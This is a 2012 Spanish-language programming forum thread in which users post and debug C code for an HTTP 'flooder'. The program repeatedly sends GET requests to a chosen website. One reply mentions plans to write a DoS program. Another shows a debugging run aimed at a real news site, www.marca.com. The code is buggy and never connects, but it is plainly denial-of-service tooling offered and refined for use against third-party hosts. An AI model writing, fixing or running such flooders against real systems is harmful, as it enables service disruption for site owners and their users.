elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  flooder
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: flooder  (Leído 1,752 veces)
ankora45

Desconectado Desconectado

Mensajes: 52



Ver Perfil
flooder
« en: 16 Octubre 2012, 18:09 pm »

Hola alguien me dice por que no funciona este flooder xD nunca conecta con el servidor
Código
  1. #include <unistd.h>
  2. #include <stdio.h>
  3. #include <arpa/inet.h>
  4. #include <sys/socket.h>
  5. #include <netinet/in.h>
  6. #include <netdb.h>
  7. #include <stdlib.h>
  8. #include <string.h>
  9. #include <iostream>
  10.  
  11. int main(int argc, char *argv[])
  12. {
  13.  char request[1024];
  14.  char web[20];
  15.  int puertods;
  16.  printf("escribe la direccion web\n");
  17.  std::cin>>web;
  18.  printf("escribe el puerto (90 & 80) por defecto\n");
  19.  std::cin>>puertods;
  20.  struct hostent *host = gethostbyname(web);
  21.  if(!host)
  22.  {
  23.    printf("No se ha podido resolver la direccion del servidor");
  24.    exit(1);
  25.  }
  26.  struct sockaddr_in sock;
  27.  sock.sin_family = AF_INET;
  28.  sock.sin_port = htons(puertods);
  29.  sock.sin_addr.s_addr = inet_addr(host->h_addr);
  30.  
  31.  
  32. int sockfd = socket(AF_INET, SOCK_STREAM, 0);
  33. int aux = connect(sockfd, (struct sockaddr*) &sock, sizeof(sock));
  34. if(aux==-1)
  35. {
  36.  printf("No se pudo conectar al servidor");
  37.  exit(2);
  38. }
  39. sprintf(request, "GET / HTTP/1.1\nHost: %s\nUser-Agent: Mozilla/4.0\n\n ", host->h_name);
  40. for(aux=0; aux<2000; aux++)
  41. {
  42.   write(sockfd, request, strlen(request));
  43. }
  44.  
  45. }
  46.  


En línea

Hay dos cosas infinitas en este mundo, el universo y la estupidez humana, y de la primera no estoy muy seguro
Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: flooder
« Respuesta #1 en: 16 Octubre 2012, 18:14 pm »

yo este viernes quiero intentar hacer un programa de DOS haber si me tira mi router XD.

Si entonces no sabes como solucionar tu error pues lo miro y te digo k falla.

PD:Posteo ya que de paso me servirá por si tengo un error similar XD


En línea

0xDani


Desconectado Desconectado

Mensajes: 1.077



Ver Perfil
Re: flooder
« Respuesta #2 en: 17 Octubre 2012, 14:03 pm »

Despues de añadir bastante codigo para comprobar errores me ha quedado esto:

Código
  1. #include <unistd.h>
  2. #include <stdio.h>
  3. #include <arpa/inet.h>
  4. #include <sys/socket.h>
  5. #include <netinet/in.h>
  6. #include <netdb.h>
  7. #include <stdlib.h>
  8. #include <string.h>
  9. #include <inttypes.h>
  10.  
  11. int main(int argc, char *argv[])
  12. {
  13.  char request[1024];
  14.  struct hostent *host = gethostbyname(argv[1]);
  15.  if(!host)
  16.  {
  17.    printf("No se ha podido resolver la direccion del servidor\n");
  18.    _exit(1);
  19.  }
  20.  printf("host->h_addr: %s\n", inet_ntoa(*((struct in_addr *)host->h_addr)));
  21.  struct sockaddr_in sock;
  22.  sock.sin_family = AF_INET;
  23.  sock.sin_port = htonl(atoi(argv[2]));
  24.  sock.sin_addr.s_addr = inet_addr(inet_ntoa(*((struct in_addr *)host->h_addr)));
  25.  printf("Direccion: %d\n", sock.sin_addr.s_addr);
  26.  
  27. int sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  28. if(sockfd==-1)
  29. {
  30.  printf("No se pudo crear el socket\n");
  31.  _exit(3);
  32. }
  33. printf("Socket creado\n");
  34. int aux;
  35. printf("Conectando...\n");
  36. if(connect(sockfd, (struct sockaddr*) &sock, sizeof(struct sockaddr)))
  37. {
  38.  printf("No se pudo conectar al servidor\n");
  39.  _exit(2);
  40. }
  41. printf("Conectado\n");
  42. sprintf(request, "GET / HTTP/1.1\nHost: %s\nUser-Agent: Mozilla/4.0\n\n ", host->h_name);
  43. printf("Peticion en request\n");
  44. for(aux=0; aux<3; aux++)
  45. {
  46.   write(sockfd, request, strlen(request));
  47.   printf("%i peticion", aux);
  48. }
  49.  close(sockfd);
  50. return 0;
  51. }
  52.  

La salida:
Código:
$ ./flooder www.marca.com 80
host->h_addr: 193.110.128.199
20480
Direccion: -947884351
Socket creado
Conectando...
//Y tras varios minutos...
No se pudo conectar al servidor

Nunca llega a conectar, no se porque.
En línea

I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como puedo hacer un flooder?
Programación Visual Basic
Coky 1 1,018 Último mensaje 29 Abril 2006, 16:38 pm
por NYlOn
Flooder MSN.VB con formas XD + Binarios y Source
Programación Visual Basic
Codename!! 6 1,925 Último mensaje 30 Diciembre 2006, 20:19 pm
por Codename!!
UDP flooder en VB6
Programación Visual Basic
elrecar 1 3,075 Último mensaje 30 Agosto 2007, 21:22 pm
por elrecar
[TUTORIAL] Crear un Flooder
.NET (C#, VB.NET, ASP)
gonzalo57 6 3,631 Último mensaje 30 Mayo 2012, 21:37 pm
por gonzalo57
[Aporte] Flooder HTTP
Programación C/C++
0xDani 4 3,243 Último mensaje 30 Octubre 2012, 15:39 pm
por 0xDani
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines